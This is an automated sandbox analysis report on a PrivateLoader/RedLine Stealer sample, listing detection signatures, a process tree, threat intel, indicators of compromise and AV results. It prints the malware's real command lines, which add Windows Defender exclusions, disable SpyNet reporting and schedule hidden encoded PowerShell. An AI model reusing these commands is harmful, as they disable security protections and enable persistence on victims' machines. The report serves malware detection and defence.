Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:	file.exe
Analysis ID:	1345843
MD5:	db05c4ddd1c651561ce6b89e99a332f6
SHA1:	e92017c7673b82ef1c64c60a19e09307b902e73a
SHA256:	217265f9279820005c1037dd06668169a841230842ddd53961122066d9fb6786
Tags:	NETexeMSIL
Infos:

Detection

PrivateLoader, RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected RedLine Stealer

Sigma detected: Schedule system process

Antivirus detection for URL or domain

Antivirus detection for dropped file

Sigma detected: Drops script at startup location

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Yara detected PrivateLoader

Disable Windows Defender real time protection (registry)

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Tries to detect sandboxes and other dynamic analysis tools (window names)

Query firmware table information (likely to detect VMs)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Uses cmd line tools excessively to alter registry or file data

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Machine Learning detection for sample

.NET source code contains very large array initializations

Writes many files with high entropy

Drops script or batch files to the startup folder

Adds a directory exclusion to Windows Defender

Modifies Group Policy settings

Sample uses string decryption to hide its real strings

Uses schtasks.exe or at.exe to add and modify task schedules

Tries to harvest and steal browser information (history, passwords, etc)

Hides threads from debuggers

Creates HTML files with .exe extension (expired dropper behavior)

.NET source code references suspicious native API functions

Modifies the hosts file

Yara detected Generic Downloader

Modifies Windows Defender protection settings

Machine Learning detection for dropped file

Disables Windows Defender (deletes autostart)

Disables UAC (registry)

Adds extensions / path to Windows Defender exclusion list

Drops PE files to the application program directory (C:\ProgramData)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Stores files to the Windows start menu directory

Contains functionality to dynamically determine API calls

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops PE files

Tries to load missing DLLs

Checks if the current process is being debugged

Binary contains a suspicious time stamp

Creates a start menu entry (Start Menu\Programs\Startup)

Uses reg.exe to modify the Windows registry

Creates a process in suspended mode (likely to inject code)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Deletes files inside the Windows folder

Creates files inside the system directory

Found potential string decryption / allocating functions

Found dropped PE file which has not been started or loaded

Enables debug privileges

Queries information about the installed CPU (vendor, model number etc)

Sample file is different than original file name gathered from version info

Contains capabilities to detect virtual machines

PE / OLE file has an invalid certificate

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

file.exe (PID: 400 cmdline: C:\Users\user\Desktop\file.exe MD5: DB05C4DDD1C651561CE6B89E99A332F6)

powershell.exe (PID: 1444 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -Force MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

CasPol.exe (PID: 5128 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe MD5: 914F728C04D3EDDD5FBA59420E74E56B)

BXuFYgf6xs2uEKGHPQsSTe25.exe (PID: 2292 cmdline: "C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe" MD5: 1C4BA9EB815AD39858DEF7341D3CFFF1)

r1O81gOTKkD0PfSdUigHGcl2.exe (PID: 2284 cmdline: "C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe" --silent --allusers=0 MD5: AC33A958FADA5BCB892E03D1FF810D8A)

r1O81gOTKkD0PfSdUigHGcl2.exe (PID: 3128 cmdline: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=105.0.4970.16 --initial-client-data=0x2f4,0x2f8,0x2fc,0x2d0,0x300,0x6cf674f0,0x6cf67500,0x6cf6750c MD5: AC33A958FADA5BCB892E03D1FF810D8A)

r1O81gOTKkD0PfSdUigHGcl2.exe (PID: 4080 cmdline: "C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\r1O81gOTKkD0PfSdUigHGcl2.exe" --version MD5: AC33A958FADA5BCB892E03D1FF810D8A)

r1O81gOTKkD0PfSdUigHGcl2.exe (PID: 5864 cmdline: "C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\user\AppData\Local\Programs\Opera" --profile-folder --language=en-GB --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=2284 --package-dir-prefix="C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231121151234" --session-guid=0bda333d-4994-4b67-9b59-0f927372c94a --server-tracking-blob=ZDUxMWEyYzQyYmU3YjNmMDI3NzRlNWM2YTg1YzY1MzdlNGQ4ZGExMzhjNzg4MGQyMThiMzI4OGVlZWIyNTVmNDp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwMDU3NTk0OS4yNzIzIiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiI5ZjZlMmVjMS0wNzBjLTRmYWEtODc4OS01ZWEyMjQ2NDhkMTUifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=7005000000000000 MD5: AC33A958FADA5BCB892E03D1FF810D8A)

r1O81gOTKkD0PfSdUigHGcl2.exe (PID: 5848 cmdline: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=105.0.4970.16 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2c0,0x2f0,0x6c4774f0,0x6c477500,0x6c47750c MD5: AC33A958FADA5BCB892E03D1FF810D8A)

3igcf6uAz0sWTHiwyuTtf5S5.exe (PID: 6828 cmdline: "C:\Users\user\Pictures\3igcf6uAz0sWTHiwyuTtf5S5.exe" MD5: 9873907D252DCECD6BAEA9A11AC4B0DA)

8AbV0HUy7VtZhy8wnNLXmsko.exe (PID: 4000 cmdline: "C:\Users\user\Pictures\8AbV0HUy7VtZhy8wnNLXmsko.exe" MD5: D373FF7CB6AC28B844D9C90FC8F1AB3F)

DU9aZfxw1xhKC4ykOgcxwHTl.exe (PID: 6080 cmdline: "C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe" MD5: C67B184E265425655EB485932963AF53)

AdivwWrpQRED15lxH0DgRVgj.exe (PID: 3436 cmdline: "C:\Users\user\Pictures\AdivwWrpQRED15lxH0DgRVgj.exe" MD5: 5CCF030395F0F69B0C11A11E26B31833)

Install.exe (PID: 5740 cmdline: .\Install.exe MD5: 2CAFB9685610BFF31960C959887426AA)

Install.exe (PID: 616 cmdline: .\Install.exe /eeGFndidj "385121" /S MD5: 24A387FDA6E0F36F9AF44D65487C5F5B)

forfiles.exe (PID: 7492 cmdline: C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64& MD5: D95C443851F70F77427B3183B1619DD3)

conhost.exe (PID: 7512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7636 cmdline: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64& MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

reg.exe (PID: 7744 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32 MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

forfiles.exe (PID: 7588 cmdline: C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64& MD5: D95C443851F70F77427B3183B1619DD3)

conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7960 cmdline: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64& MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

reg.exe (PID: 8124 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32 MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

schtasks.exe (PID: 8060 cmdline: schtasks /CREATE /TN "gXUhwMAMn" /SC once /ST 08:40:27 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 8144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

QsTe5POhA2TpmBwMLub9ymVB.exe (PID: 7324 cmdline: "C:\Users\user\Pictures\QsTe5POhA2TpmBwMLub9ymVB.exe" MD5: 1C4BA9EB815AD39858DEF7341D3CFFF1)

OPqTdTFbxWlK6znimRD995XD.exe (PID: 7356 cmdline: "C:\Users\user\Pictures\OPqTdTFbxWlK6znimRD995XD.exe" --silent --allusers=0 MD5: 9D8AD117253C7E7E5CEBB1CF22A79E68)

OPqTdTFbxWlK6znimRD995XD.exe (PID: 7716 cmdline: C:\Users\user\Pictures\OPqTdTFbxWlK6znimRD995XD.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=105.0.4970.16 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2c0,0x2f0,0x6b3d74f0,0x6b3d7500,0x6b3d750c MD5: 9D8AD117253C7E7E5CEBB1CF22A79E68)

TNpJBjREJ9Gyf03FTGsVwgMm.exe (PID: 7392 cmdline: "C:\Users\user\Pictures\TNpJBjREJ9Gyf03FTGsVwgMm.exe" MD5: D373FF7CB6AC28B844D9C90FC8F1AB3F)

6Y6HZLXw0Y38mRwaQb51f9Xr.exe (PID: 7436 cmdline: "C:\Users\user\Pictures\6Y6HZLXw0Y38mRwaQb51f9Xr.exe" MD5: 9873907D252DCECD6BAEA9A11AC4B0DA)

jmqKcbM6AONnRhvOZmBZdvm3.exe (PID: 7456 cmdline: "C:\Users\user\Pictures\jmqKcbM6AONnRhvOZmBZdvm3.exe" MD5: 5CCF030395F0F69B0C11A11E26B31833)

Install.exe (PID: 7672 cmdline: .\Install.exe MD5: 2CAFB9685610BFF31960C959887426AA)

5zZpiaRyAwCkDYAcy3rJRYSk.exe (PID: 7480 cmdline: "C:\Users\user\Pictures\5zZpiaRyAwCkDYAcy3rJRYSk.exe" MD5: C67B184E265425655EB485932963AF53)

HLT0AIxjEwuNSfgdyWiT3ueK.exe (PID: 7644 cmdline: "C:\Users\user\Pictures\HLT0AIxjEwuNSfgdyWiT3ueK.exe" MD5: 1C4BA9EB815AD39858DEF7341D3CFFF1)

LnQdFAFVk46H7elzEZZ3Xdvx.exe (PID: 7704 cmdline: "C:\Users\user\Pictures\LnQdFAFVk46H7elzEZZ3Xdvx.exe" --silent --allusers=0 MD5: AA41F78F1F683FA82608B042E57ECA06)

loKi89nha4JKgsufhuKQ22oF.exe (PID: 7736 cmdline: "C:\Users\user\Pictures\loKi89nha4JKgsufhuKQ22oF.exe" MD5: D373FF7CB6AC28B844D9C90FC8F1AB3F)

BRaFXbmvcphOkoXIZ6VZLdvL.exe (PID: 7768 cmdline: "C:\Users\user\Pictures\BRaFXbmvcphOkoXIZ6VZLdvL.exe" MD5: 5CCF030395F0F69B0C11A11E26B31833)

yYAwgDWrkYJyyOGvYzyiJrxu.exe (PID: 8188 cmdline: "C:\Users\user\Pictures\yYAwgDWrkYJyyOGvYzyiJrxu.exe" MD5: C67B184E265425655EB485932963AF53)

powershell.exe (PID: 4700 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2220 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4aBHXrK8XjSbEjiL1WIQ7Kmf.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

6V2xKGSdzZOG2l67fqdIp9iJ.exe (PID: 7336 cmdline: "C:\Users\user\AppData\Local\6V2xKGSdzZOG2l67fqdIp9iJ.exe" MD5: 1C4BA9EB815AD39858DEF7341D3CFFF1)

cmd.exe (PID: 7784 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AS0hnlpl66MtE0KLhjjOLNaC.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
PrivateLoader	According to sekoia, PrivateLoader is a modular malware whose main capability is to download and execute one or several payloads. The loader implements anti-analysis techniques, fingerprints the compromised host and reports statistics to its C2 server.	No Attribution	https://any.run/cybersecurity-blog/privateloader-analyzing-the-encryption-and-decryption-of-a-modern-loader/ https://bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem https://de.darktrace.com/blog/privateloader-network-based-indicators-of-compromise	https://malpedia.caad.fkie.fraunhofer.de/details/win.privateloader

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/ https://bartblaze.blogspot.com/2021/06/digital-artists-targeted-in-redline.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\Pictures\Minor Policy\6CYB0iVk9rownSr74i6xHL6G.exe	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\home[1].exe	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
C:\Users\user\Pictures\Minor Policy\eoK_HtB8HzOnJQBreBydnt5f.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\Pictures\Minor Policy\eoK_HtB8HzOnJQBreBydnt5f.exe	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x3f90c:$v2_1: ListOfProcesses 0x3f450:$v4_3: base64str 0x41612:$v4_4: stringKey 0x3b1b8:$v4_5: BytesToStringConverted 0x3a560:$v4_6: FromBase64 0x3be20:$v4_8: procName 0x3ad3f:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.file.exe.2bd4758.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.file.exe.2bd7180.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security

Sigma Signatures

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, ProcessId: 5128, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LwUEIn0u42avRg7NWL5JGs75.bat

Persistence and Installation Behavior

Sigma detected: Schedule system process

Source: Process started

Author: Joe Security: Data: Command: schtasks /CREATE /TN "gXUhwMAMn" /SC once /ST 08:40:27 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==", CommandLine: schtasks /CREATE /TN "gXUhwMAMn" /SC once /ST 08:40:27 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==", CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: .\Install.exe /eeGFndidj "385121" /S, ParentImage: C:\Users\user\AppData\Local\Temp\7zSD456.tmp\Install.exe, ParentProcessId: 616, ParentProcessName: Install.exe, ProcessCommandLine: schtasks /CREATE /TN "gXUhwMAMn" /SC once /ST 08:40:27 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==", ProcessId: 8060, ProcessName: schtasks.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://167.235.143.166/g	Avira URL Cloud: Label: malware
Source: https://167.235.143.166/m	Avira URL Cloud: Label: malware
Source: https://desktop-netinstaller-sub.osp.opera.software/v1/binary;	Avira URL Cloud: Label: malware
Source: https://desktop-netinstaller-sub.osp.opera.software/v1/binary	Avira URL Cloud: Label: malware
Source: https://167.235.143.166/6	Avira URL Cloud: Label: malware
Source: https://167.235.143.166/E	Avira URL Cloud: Label: malware
Source: https://167.235.143.166/66	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\4f5Nx5TIr9aFLxNLjJPgXzZC.exe	Avira: detection malicious, Label: TR/AD.Nekark.bdamo
Source: C:\Users\user\AppData\Local\KTrOP3dHFImCgksUms5y6GT0.exe	Avira: detection malicious, Label: HEUR/AGEN.1303617
Source: C:\Users\user\AppData\Local\BBqYMraWtNak9E70T03xv71q.exe	Avira: detection malicious, Label: HEUR/AGEN.1303617
Source: C:\Users\user\AppData\Local\6V2xKGSdzZOG2l67fqdIp9iJ.exe	Avira: detection malicious, Label: HEUR/AGEN.1312670
Source: C:\Users\user\AppData\Local\7kfsbB1Hl48Vwwq14EpVnfnY.exe	Avira: detection malicious, Label: TR/AD.Nekark.bdamo
Source: C:\Users\user\AppData\Local\JJ3cNx9vKHcCuMyuszfvJls9.exe	Avira: detection malicious, Label: HEUR/AGEN.1303617
Source: C:\Program Files\Google\Chrome\updater.exe	Avira: detection malicious, Label: TR/AD.Nekark.bdamo
Source: C:\Users\user\AppData\Local\H62xkOOft6fSMQ98kaLeH0L3.exe	Avira: detection malicious, Label: HEUR/AGEN.1312670
Source: C:\Users\user\AppData\Local\7vGVJ4vo69rcWRQudRLDXauN.exe	Avira: detection malicious, Label: HEUR/AGEN.1312670
Source: C:\Users\user\AppData\Local\4HEo1sjjkhLSQkWpfp7Tvy6i.exe	Avira: detection malicious, Label: TR/AD.Nekark.bdamo

Multi AV Scanner detection for submitted file

Source: file.exe	ReversingLabs: Detection: 40%
Source: file.exe	Virustotal: Detection: 41%			Perma Link

Multi AV Scanner detection for domain / URL

Source: https://167.235.143.166/g	Virustotal: Detection: 11%	Perma Link
Source: https://167.235.143.166/	Virustotal: Detection: 6%	Perma Link
Source: https://167.235.143.166	Virustotal: Detection: 6%	Perma Link
Source: https://167.235.143.166/m	Virustotal: Detection: 13%	Perma Link
Source: https://167.235.143.166/%	Virustotal: Detection: 10%	Perma Link
Source: https://167.235.143.166/E	Virustotal: Detection: 11%	Perma Link
Source: https://167.235.143.166/6	Virustotal: Detection: 11%	Perma Link
Source: https://167.235.143.166/66	Virustotal: Detection: 11%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Program Files\Google\Chrome\updater.exe	ReversingLabs: Detection: 87%
Source: C:\Program Files\Google\Chrome\updater.exe	Virustotal: Detection: 76%	Perma Link
Source: C:\Users\user\AppData\Local\3zo1tV5f3Ay9BnN3gEE89S3s.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\3zo1tV5f3Ay9BnN3gEE89S3s.exe	Virustotal: Detection: 61%	Perma Link
Source: C:\Users\user\AppData\Local\4HEo1sjjkhLSQkWpfp7Tvy6i.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\4f5Nx5TIr9aFLxNLjJPgXzZC.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\6V2xKGSdzZOG2l67fqdIp9iJ.exe	ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\7kfsbB1Hl48Vwwq14EpVnfnY.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\7vGVJ4vo69rcWRQudRLDXauN.exe	ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\BBqYMraWtNak9E70T03xv71q.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Dd4nzJ5vUMeQnN3MK6ZRgV3f.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\GpflmvanezvTQUdAxFgnanZZ.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\H62xkOOft6fSMQ98kaLeH0L3.exe	ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\JJ3cNx9vKHcCuMyuszfvJls9.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\KTrOP3dHFImCgksUms5y6GT0.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\build[1].exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\Service_32[1].exe	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\home[1].exe	ReversingLabs: Detection: 59%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\timeSync[1].exe	ReversingLabs: Detection: 37%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\xin[1].exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\36b88b89v[1].exe	ReversingLabs: Detection: 40%
Source: C:\Users\user\AppData\Local\OUk0jc7FyA7JiXBcKBsav4Ex.exe	ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\OeIzFpPQv96lBLRJ074Q8fw6.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\PG0i0imJz19jFNp7ko6pIPRA.exe	ReversingLabs: Detection: 87%

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: GetProcAddress
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: LoadLibraryA
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: lstrcatA
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: OpenEventA
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: CreateEventA
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: CloseHandle
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: Sleep
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: GetUserDefaultLangID
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: VirtualAllocExNuma
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: VirtualFree
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: GetSystemInfo
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: VirtualAlloc
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: HeapAlloc
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: GetComputerNameA
Source: 6.3.BXuFYgf6xs2uEKGHPQsSTe25.exe.2290000.0.raw.unpack	String decryptor: lstrcpyA
